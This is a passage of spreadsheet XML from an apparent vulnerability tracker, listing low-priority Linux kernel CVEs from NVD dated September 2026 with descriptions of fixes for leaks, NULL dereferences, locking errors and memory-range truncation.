      <c r="F1608" s="5" t="inlineStr"/>
      <c r="G1608" s="5" t="inlineStr"/>
      <c r="H1608" s="5" t="inlineStr"/>
      <c r="I1608" s="5" t="inlineStr"/>
      <c r="J1608" s="5" t="inlineStr"/>
      <c r="K1608" s="5" t="inlineStr"/>
      <c r="L1608" s="5" t="inlineStr"/>
      <c r="M1608" s="5" t="inlineStr"/>
      <c r="N1608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1608" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1608" s="5" t="inlineStr"/>
      <c r="Q1608" s="5" t="inlineStr"/>
      <c r="R1608" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: chemical: sgp30: Handle IAQ thread creation failure
kthread_run() can fail and return an error pointer, but sgp_probe() stores
it and returns success, so the device is registered without its IAQ thread
and sgp_remove() later passes the error pointer to kthread_stop(). Return
the error from probe instead.</t>
        </is>
      </c>
      <c r="S1608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89937</t>
        </is>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89939</t>
        </is>
      </c>
      <c r="D1609" s="5" t="inlineStr"/>
      <c r="E1609" s="5" t="inlineStr"/>
      <c r="F1609" s="5" t="inlineStr"/>
      <c r="G1609" s="5" t="inlineStr"/>
      <c r="H1609" s="5" t="inlineStr"/>
      <c r="I1609" s="5" t="inlineStr"/>
      <c r="J1609" s="5" t="inlineStr"/>
      <c r="K1609" s="5" t="inlineStr"/>
      <c r="L1609" s="5" t="inlineStr"/>
      <c r="M1609" s="5" t="inlineStr"/>
      <c r="N1609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1609" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1609" s="5" t="inlineStr"/>
      <c r="Q1609" s="5" t="inlineStr"/>
      <c r="R1609" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iio: chemical: atlas-sensor: fix PM reference leak in buffer postenable
atlas_buffer_postenable() acquires a runtime PM reference with
pm_runtime_resume_and_get() but returns the result of
atlas_set_interrupt() directly. If atlas_set_interrupt() fails,
the runtime PM reference is leaked and the device can never
autosuspend.
Add pm_runtime_put_autosuspend() on the error path to balance
the reference.</t>
        </is>
      </c>
      <c r="S1609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89939</t>
        </is>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89944</t>
        </is>
      </c>
      <c r="D1610" s="5" t="inlineStr"/>
      <c r="E1610" s="5" t="inlineStr"/>
      <c r="F1610" s="5" t="inlineStr"/>
      <c r="G1610" s="5" t="inlineStr"/>
      <c r="H1610" s="5" t="inlineStr"/>
      <c r="I1610" s="5" t="inlineStr"/>
      <c r="J1610" s="5" t="inlineStr"/>
      <c r="K1610" s="5" t="inlineStr"/>
      <c r="L1610" s="5" t="inlineStr"/>
      <c r="M1610" s="5" t="inlineStr"/>
      <c r="N1610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1610" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1610" s="5" t="inlineStr"/>
      <c r="Q1610" s="5" t="inlineStr"/>
      <c r="R1610" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: hdac_hda: Fix hlink refcount leak on component registration failure
hdac_hda_dev_probe() gets the HDA link with snd_hdac_ext_bus_link_get()
before registering the ASoC component. If component registration fails,
the function returns without dropping the link reference.
Always call snd_hdac_ext_bus_link_put() after the registration attempt so
the reference taken during probe is balanced on both success and failure.</t>
        </is>
      </c>
      <c r="S1610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89944</t>
        </is>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89945</t>
        </is>
      </c>
      <c r="D1611" s="5" t="inlineStr"/>
      <c r="E1611" s="5" t="inlineStr"/>
      <c r="F1611" s="5" t="inlineStr"/>
      <c r="G1611" s="5" t="inlineStr"/>
      <c r="H1611" s="5" t="inlineStr"/>
      <c r="I1611" s="5" t="inlineStr"/>
      <c r="J1611" s="5" t="inlineStr"/>
      <c r="K1611" s="5" t="inlineStr"/>
      <c r="L1611" s="5" t="inlineStr"/>
      <c r="M1611" s="5" t="inlineStr"/>
      <c r="N1611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1611" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1611" s="5" t="inlineStr"/>
      <c r="Q1611" s="5" t="inlineStr"/>
      <c r="R1611" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: cs35l34: drain threaded IRQ before runtime suspend
cs35l34_runtime_suspend() currently switches the codec into
regcache_cache_only(true), asserts reset low, and powers the device off
without first quiescing the threaded IRQ registered by
devm_request_threaded_irq(). That leaves a window where
cs35l34_irq_thread() can still run after suspend has removed live
hardware access.
A running system can reach this during runtime PM while the driver still
has critical fault IRQs unmasked. If the threaded handler runs in that
window, it reads volatile INT_STATUS_1..4 after cache_only has been
enabled, ignores the regmap_read() failures, and can still execute the
PROT_RELEASE_CTL release sequence or the BST fault power-down writes.
Use disable_irq() before entering cache_only/reset-low/power-off so any
in-flight threaded handler is drained and no new IRQ thread can run
while the device is suspended. Re-enable the IRQ only after
runtime_resume() has restored live register access with regcache_sync().
Since probe only logs request_threaded_irq() failures and keeps going,
track whether the IRQ was actually installed before disabling or
re-enabling it.</t>
        </is>
      </c>
      <c r="S1611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89945</t>
        </is>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89946</t>
        </is>
      </c>
      <c r="D1612" s="5" t="inlineStr"/>
      <c r="E1612" s="5" t="inlineStr"/>
      <c r="F1612" s="5" t="inlineStr"/>
      <c r="G1612" s="5" t="inlineStr"/>
      <c r="H1612" s="5" t="inlineStr"/>
      <c r="I1612" s="5" t="inlineStr"/>
      <c r="J1612" s="5" t="inlineStr"/>
      <c r="K1612" s="5" t="inlineStr"/>
      <c r="L1612" s="5" t="inlineStr"/>
      <c r="M1612" s="5" t="inlineStr"/>
      <c r="N1612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1612" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1612" s="5" t="inlineStr"/>
      <c r="Q1612" s="5" t="inlineStr"/>
      <c r="R1612" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: cs35l33: drain threaded IRQ before runtime suspend
cs35l33_runtime_suspend() currently switches the codec into
regcache_cache_only(true) and powers it down without first quiescing the
threaded IRQ registered by devm_request_threaded_irq(). That leaves a
window where cs35l33_irq_thread() can still run after suspend has closed
off live register access.
A running system can reach this during runtime PM while the driver still
has critical fault IRQs unmasked. If the threaded handler runs in that
window, it reads volatile INT_STATUS_1/2 after cache_only has been
enabled, ignores the regmap_read() failures, and can still drive the
AMP_SHORT_RLS, CAL_ERR_RLS, OTE_RLS, and OTW_RLS release paths.
Use disable_irq() before entering cache_only/power-off so any in-flight
threaded handler is drained and no new IRQ thread can run during the
suspended state. Re-enable the IRQ only after runtime_resume() has
restored live register access with regcache_sync(). Since probe only
warns if devm_request_threaded_irq() fails, track whether the IRQ was
actually installed before disabling or re-enabling it.</t>
        </is>
      </c>
      <c r="S1612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89946</t>
        </is>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89948</t>
        </is>
      </c>
      <c r="D1613" s="5" t="inlineStr"/>
      <c r="E1613" s="5" t="inlineStr"/>
      <c r="F1613" s="5" t="inlineStr"/>
      <c r="G1613" s="5" t="inlineStr"/>
      <c r="H1613" s="5" t="inlineStr"/>
      <c r="I1613" s="5" t="inlineStr"/>
      <c r="J1613" s="5" t="inlineStr"/>
      <c r="K1613" s="5" t="inlineStr"/>
      <c r="L1613" s="5" t="inlineStr"/>
      <c r="M1613" s="5" t="inlineStr"/>
      <c r="N1613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1613" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1613" s="5" t="inlineStr"/>
      <c r="Q1613" s="5" t="inlineStr"/>
      <c r="R1613" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: bla: fix freeing of claims on meshif deletion
When the mesh interface is getting deleted, then
batadv_bla_del_backbone_claims() (via batadv_bla_purge_backbone_gw()) could
make sure that all claims gets removed. But this function is only executed
when bat_priv-&gt;bla.claim_hash is not NULL. And since batadv_bla_free() is
always setting it to NULL before it is (indirectly) called, it was never
actually executed.
But the batadv_bla_purge_claims() -&gt; batadv_handle_unclaim() is at the
moment too fragile because the BLA code is not handling the rehashing in
batadv_bla_update_orig_address(). The stored backbone address doesn't have
to be the one actually used for the hash bucket selection during the
initial adding of the backbone. The batadv_handle_unclaim() can therefore
fail to find the respective backbone for the unclaim and then stop the
deletion.
But the actual backbone_gw object is not needed for the unclaim because all
relevant information is always provided by the caller. And the check for
the existence of the backbone_gw doesn't provide any additional security
check for the deletion of a claim.</t>
        </is>
      </c>
      <c r="S1613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89948</t>
        </is>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89949</t>
        </is>
      </c>
      <c r="D1614" s="5" t="inlineStr"/>
      <c r="E1614" s="5" t="inlineStr"/>
      <c r="F1614" s="5" t="inlineStr"/>
      <c r="G1614" s="5" t="inlineStr"/>
      <c r="H1614" s="5" t="inlineStr"/>
      <c r="I1614" s="5" t="inlineStr"/>
      <c r="J1614" s="5" t="inlineStr"/>
      <c r="K1614" s="5" t="inlineStr"/>
      <c r="L1614" s="5" t="inlineStr"/>
      <c r="M1614" s="5" t="inlineStr"/>
      <c r="N1614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1614" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1614" s="5" t="inlineStr"/>
      <c r="Q1614" s="5" t="inlineStr"/>
      <c r="R1614" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: dat: avoid unaligned fault in IP extraction
Independent of the alignment of the ARP packet in the SKB, either the
batadv_arp_ip_src or the batadv_arp_ip_dst will have an unaligned access
(on HW without native unaligned read support).
Use get_unaligned() to handle this properly on all architectures.</t>
        </is>
      </c>
      <c r="S1614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89949</t>
        </is>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89950</t>
        </is>
      </c>
      <c r="D1615" s="5" t="inlineStr"/>
      <c r="E1615" s="5" t="inlineStr"/>
      <c r="F1615" s="5" t="inlineStr"/>
      <c r="G1615" s="5" t="inlineStr"/>
      <c r="H1615" s="5" t="inlineStr"/>
      <c r="I1615" s="5" t="inlineStr"/>
      <c r="J1615" s="5" t="inlineStr"/>
      <c r="K1615" s="5" t="inlineStr"/>
      <c r="L1615" s="5" t="inlineStr"/>
      <c r="M1615" s="5" t="inlineStr"/>
      <c r="N1615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1615" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1615" s="5" t="inlineStr"/>
      <c r="Q1615" s="5" t="inlineStr"/>
      <c r="R1615" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
batman-adv: mcast: linearize skbuff for packet generation
batadv_mcast_forw_packet() and batadv_mcast_forw_scrape() is not only
called (indirectly) by the unsharing+linearizing batadv_recv_mcast_packet()
handler. When it is called (indirectly) by batadv_mcast_forw_mcsend() then
it will be unshared but not linearized. The SKB_LINEAR_ASSERT() can
therefore cause a fatal BUG().
The linearization should happen during the expansion of the head because
the scrape function can be hit already during the initial
batadv_mcast_forw_mode() selection code:
* batadv_interface_tx
* batadv_mcast_forw_mode
* batadv_mcast_forw_mode_by_count()
* batadv_mcast_forw_push()
  -&gt; calls batadv_mcast_forw_expand_head() before everything else
* batadv_mcast_forw_push_tvlvs()
* batadv_mcast_forw_push_dests()
* batadv_mcast_forw_push_adjust_padding()
* batadv_mcast_forw_scrape()</t>
        </is>
      </c>
      <c r="S1615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89950</t>
        </is>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89952</t>
        </is>
      </c>
      <c r="D1616" s="5" t="inlineStr"/>
      <c r="E1616" s="5" t="inlineStr"/>
      <c r="F1616" s="5" t="inlineStr"/>
      <c r="G1616" s="5" t="inlineStr"/>
      <c r="H1616" s="5" t="inlineStr"/>
      <c r="I1616" s="5" t="inlineStr"/>
      <c r="J1616" s="5" t="inlineStr"/>
      <c r="K1616" s="5" t="inlineStr"/>
      <c r="L1616" s="5" t="inlineStr"/>
      <c r="M1616" s="5" t="inlineStr"/>
      <c r="N1616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1616" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1616" s="5" t="inlineStr"/>
      <c r="Q1616" s="5" t="inlineStr"/>
      <c r="R1616" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: rawnand: validate ONFI extended parameter page sections
nand_flash_detect_ext_param_page() allocates the length declared by the
ONFI parameter page, then treats the data as a fixed header followed by
variable-length sections. It reads that header and advances over sections
without first proving that the fixed page and each current section fit in
the allocation.
Reject pages shorter than the fixed header, track the remaining variable
area while walking sections, and require the ECC section to contain every
field read from struct onfi_ext_ecc_info. Use device-scoped diagnostics
that identify the malformed ONFI section.</t>
        </is>
      </c>
      <c r="S1616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89952</t>
        </is>
      </c>
    </row>
    <row r="1617">
      <c r="A1617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89953</t>
        </is>
      </c>
      <c r="D1617" s="5" t="inlineStr"/>
      <c r="E1617" s="5" t="inlineStr"/>
      <c r="F1617" s="5" t="inlineStr"/>
      <c r="G1617" s="5" t="inlineStr"/>
      <c r="H1617" s="5" t="inlineStr"/>
      <c r="I1617" s="5" t="inlineStr"/>
      <c r="J1617" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K1617" s="5" t="inlineStr"/>
      <c r="L1617" s="5" t="inlineStr"/>
      <c r="M1617" s="5" t="inlineStr"/>
      <c r="N1617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1617" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1617" s="5" t="inlineStr"/>
      <c r="Q1617" s="5" t="inlineStr"/>
      <c r="R1617" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: mtdoops: free page bitmap when the backing MTD is removed
mtdoops_notify_add() allocates oops_page_used when the configured MTD
device is registered.  mtdoops_notify_remove() detaches from that device
but leaves the bitmap allocated.  If the same MTD device is later
registered again, the add path allocates a new bitmap and overwrites the
old pointer, leaking one vmalloc allocation per remove/add cycle.
This is only visible when the backing MTD device can disappear and be
registered again while mtdoops remains loaded, so the usual static MTD
case does not expose it.
Free the bitmap after unregistering the dumper and flushing the pending
workers, then clear the pointer and page count before a later attach can
allocate fresh state.  Clearing the pointer also keeps the module exit
path from freeing the same bitmap a second time after a remove event.</t>
        </is>
      </c>
      <c r="S1617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89953</t>
        </is>
      </c>
    </row>
    <row r="1618">
      <c r="A1618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89955</t>
        </is>
      </c>
      <c r="D1618" s="5" t="inlineStr"/>
      <c r="E1618" s="5" t="inlineStr"/>
      <c r="F1618" s="5" t="inlineStr"/>
      <c r="G1618" s="5" t="inlineStr"/>
      <c r="H1618" s="5" t="inlineStr"/>
      <c r="I1618" s="5" t="inlineStr"/>
      <c r="J1618" s="5" t="inlineStr"/>
      <c r="K1618" s="5" t="inlineStr"/>
      <c r="L1618" s="5" t="inlineStr"/>
      <c r="M1618" s="5" t="inlineStr"/>
      <c r="N1618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1618" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1618" s="5" t="inlineStr"/>
      <c r="Q1618" s="5" t="inlineStr"/>
      <c r="R1618" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix NULL deref in status_show() during queue probe
When vfio_ap_mdev_probe_queue() creates the sysfs attribute group,
the queue's driver data has not yet been set. A concurrent read of
the 'status' attribute can therefore call dev_get_drvdata() and
get NULL, which is then passed directly to
vfio_ap_mdev_for_queue() where q-&gt;apqn is unconditionally
dereferenced, causing a NULL pointer dereference.
Fix this by acquiring the update locks before calling
sysfs_create_group(). The status_show() function acquires
guests_lock before reading the driver data, so any concurrent
read will block until after dev_set_drvdata() has been called
and the update locks are released.
As a bonus, the APQN no longer needs to be read from the queue
struct after allocation — it can be read directly from apdev
before allocation and stored in a local variable, which is then
assigned to q-&gt;apqn once the allocation succeeds.</t>
        </is>
      </c>
      <c r="S1618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89955</t>
        </is>
      </c>
    </row>
    <row r="1619">
      <c r="A1619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89956</t>
        </is>
      </c>
      <c r="D1619" s="5" t="inlineStr"/>
      <c r="E1619" s="5" t="inlineStr"/>
      <c r="F1619" s="5" t="inlineStr"/>
      <c r="G1619" s="5" t="inlineStr"/>
      <c r="H1619" s="5" t="inlineStr"/>
      <c r="I1619" s="5" t="inlineStr"/>
      <c r="J1619" s="5" t="inlineStr"/>
      <c r="K1619" s="5" t="inlineStr"/>
      <c r="L1619" s="5" t="inlineStr"/>
      <c r="M1619" s="5" t="inlineStr"/>
      <c r="N1619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1619" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1619" s="5" t="inlineStr"/>
      <c r="Q1619" s="5" t="inlineStr"/>
      <c r="R1619" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix missing lock required to access list of ap_matrix_mdev objects
In order to traverse or add/remove ap_matrix_mdev objects in the
matrix_dev-&gt;mdev_list, the matrix_dev-&gt;guests_lock mutex must be held.
There are two functions that access the list without holding the mutex:
vfio_ap_mdev_probe function
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The vfio_ap_mdev_probe function uses the matrix_dev-&gt;mdevs_lock
mutex to guard the add of a newly created ap_matrix_mdev object to the
matrix_dev-&gt;mdev_list. This mutex does not protect list access; its purpose
is to guard against concurrent access to fields contained in an
ap_matrix_mdev object. This could lead to kernel memory corruption or
use-after-free if another mdev is created or removed concurrently.
The adding of an ap_matrix_mdev object to matrix_dev-&gt;mdev_list
is now guarded by the matrix_dev-&gt;guests_lock which is the correct
way to protect against concurrent mdev_list access.
Also removed the following two lines of code because the matrix_mdev is
allocated via vfio_alloc_device macro which uses kzalloc, so req_trigger
and cfg_chg_trigger are already zero-initialised when the struct is
allocated before the call to vfio_register_emulated_iommu_dev. This
prevents a window whereby these triggers are set to NULL after
the device is exposed to userspace.
matrix_mdev-&gt;req_trigger = NULL;
matrix_mdev-&gt;cfg_chg_trigger = NULL;
vfio_ap_mdev_for_queue function
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The status_show function that supports display of the status attribute of
the devices in /sys/bus/ap/devices calls the vfio_ap_mdev_for_queue
function which iterates the matrix_dev-&gt;mdev_list to find the object
representing the queue device whose status is to be displayed. In order to
traverse this list, the matrix_dev-&gt;guests_lock mutex must be held.
To fix this, the guests_lock mutex is taken prior to taking the
matrix_dev-&gt;mdevs_lock mutex in the status_show function. It is taken
there rather than the vfio_ap_mdev_for_queue function - where it is
needed - because it must be taken prior to the mdevs_lock mutex in order to
adhere to the proper locking order and prevent a lockdep splat; also
because the mdevs_lock is needed there to access fields within
the matrix_mdev object in that function.
See the vfio-ap-locking.rst in the linux kernel tree.</t>
        </is>
      </c>
      <c r="S1619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89956</t>
        </is>
      </c>
    </row>
    <row r="1620">
      <c r="A1620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89958</t>
        </is>
      </c>
      <c r="D1620" s="5" t="inlineStr"/>
      <c r="E1620" s="5" t="inlineStr"/>
      <c r="F1620" s="5" t="inlineStr"/>
      <c r="G1620" s="5" t="inlineStr"/>
      <c r="H1620" s="5" t="inlineStr"/>
      <c r="I1620" s="5" t="inlineStr"/>
      <c r="J1620" s="5" t="inlineStr"/>
      <c r="K1620" s="5" t="inlineStr"/>
      <c r="L1620" s="5" t="inlineStr"/>
      <c r="M1620" s="5" t="inlineStr"/>
      <c r="N1620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1620" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1620" s="5" t="inlineStr"/>
      <c r="Q1620" s="5" t="inlineStr"/>
      <c r="R1620" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/vfio-ap: Fix dereference matrix_mdev-&gt;kvm without checking for NULL
The ap_driver structure has two fields which are function pointers to
callbacks:
* .on_config_changed: called at the start of the AP bus scan function to
                      notify the device driver that the host AP
                      configuration has changed and the associated AP
                      devices will be added or removed accordingly. This
                      gives the implementor a chance to evaluate the
                      configuration changes and respond to them before
                      the associated devices are added or removed.
* .on_scan_complete:  Called at the end of the AP bus scan function to
                      notify the device driver that the host AP
                      configuration has changed and the AP devices have
                      been added or removed accordingly. This gives the
                      implementor the opportunity to respond to the
                      changes after the associated devices are added or
                      removed.
These two callbacks are implemented in the vfio_ap device driver via the
vfio_ap_on_cfg_changed and vfio_ap_on_scan_complete functions respectively.
Within the call stack of these two callback functions the
matrix_mdev-&gt;kvm-&gt;lock mutex is taken without checking whether
matrix_mdev-&gt;kvm is NULL or not. If matrix_mdev-&gt;kvm has never been set,
trying to take the lock will trigger a NULL pointer dereference. This patch
adds checks for matrix_mdev-&gt;kvm == NULL before taking the
matrix_mdev-&gt;kvm-&gt;lock mutex.
Note that the matrix_mdev-&gt;kvm-&gt;lock mutex taken in the
vfio_ap_mdev_hot_plug_config function is moved to the calling function
along with the matrix_dev-&gt;mdevs_lock which is needed there to access
the fields of the matrix_mdev. It makes little sense to make the change
the check for matrix_mdev-&gt;kvm there before taking the kvm-&gt;lock
mutex only to have to move it out via another patch, so it is done in
this patch.
It is important to make note of the following:
1. The matrix_dev-&gt;guests_lock is acquired at the start of both callback
   functions. This ensures that matrix_mdev will not be removed via the
   vfio_ap_mdev_remove function because it too takes matrix_dev_guests_lock
   before removing the object; so, matrix_mdev will be available for the
   duration of the callback functions.
2. The matrix_dev-&gt;mdevs_lock mutex must be taken in order to access
   fields within the matrix_mdev structure
3. matrix_mdev-&gt;kvm-&gt;lock mutex must be taken before the
   matrix_dev-&gt;mdevs_lock to prevent a lockdep splat.
4: The kvm-&gt;lock must be held while plugging the guest's AP configuration
   into its SIE state description via the vfio_ap_mdev_update_guest_apcb
   function.
5. The vfio_ap_mdev_update_guest_apcb checks matrix_mdev-&gt;kvm to verify it
   is not NULL before doing the hot plug of the guest's AP configuration.</t>
        </is>
      </c>
      <c r="S1620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89958</t>
        </is>
      </c>
    </row>
    <row r="1621">
      <c r="A1621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89962</t>
        </is>
      </c>
      <c r="D1621" s="5" t="inlineStr"/>
      <c r="E1621" s="5" t="inlineStr"/>
      <c r="F1621" s="5" t="inlineStr"/>
      <c r="G1621" s="5" t="inlineStr"/>
      <c r="H1621" s="5" t="inlineStr"/>
      <c r="I1621" s="5" t="inlineStr"/>
      <c r="J1621" s="5" t="inlineStr"/>
      <c r="K1621" s="5" t="inlineStr"/>
      <c r="L1621" s="5" t="inlineStr"/>
      <c r="M1621" s="5" t="inlineStr"/>
      <c r="N1621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1621" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1621" s="5" t="inlineStr"/>
      <c r="Q1621" s="5" t="inlineStr"/>
      <c r="R1621" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/kexec_file: Prevent kexec range truncation
Sashiko AI review pointed out the following issue.
The __merge_memory_ranges() function incorrectly handles overlapping
memory ranges when merging them. Although sort_memory_ranges() sorts all
ranges by their start address in ascending order beforehand, the merge
logic remains defective in two ways:
1. It compares the current range's start against the previous element (i-1)
   instead of the running target index (idx)
2. It unconditionally overwrites 'ranges[idx].end' with 'ranges[i].end'.
This logic flaw leads to critical memory truncation when a larger memory
range completely subsumes subsequent smaller ranges.
For example, consider a sorted input array with three ranges:
  Range A (idx=0): [0x1000 - 0x9000]
  Range B (i=1):   [0x2000 - 0x5000] (completely inside Range A)
  Range C (i=2):   [0x6000 - 0x8000] (completely inside Range A)
1. When i=1 (Range B):
   ranges[1].start (0x2000) &lt;= ranges[0].end + 1 (0x9001) is TRUE.
   The code executes: ranges[0].end = ranges[1].end, which erroneously
